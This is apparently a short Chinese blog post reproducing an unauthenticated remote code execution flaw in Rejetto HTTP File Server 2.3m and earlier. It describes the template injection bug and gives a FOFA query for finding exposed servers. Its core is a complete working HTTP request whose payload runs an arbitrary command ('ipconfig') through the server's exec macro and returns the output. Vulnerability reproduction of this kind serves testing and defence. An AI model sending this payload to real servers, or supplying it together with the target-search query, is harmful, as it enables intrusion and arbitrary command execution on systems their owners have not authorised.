Babing
Published on 2024-08-30 / 2 Visits
0
0

R21-1Rejetto-HTTP文件服务器-RCE

R21-1Rejetto-HTTP文件服务器-RCE

漏洞描述:

Rejetto HTTP File Server 2.3m及之前版本存在安全漏洞,该漏洞源于存在模板注入漏洞。 成功利用这一漏洞的攻击者可以进行远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。

影响版本:

Rejetto HTTP File Server <= 2.3m

网站图片:

网站图片

fofa语法:

app=“HFS”

漏洞复现:

payload:

GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close

效果图:
效果图


Comment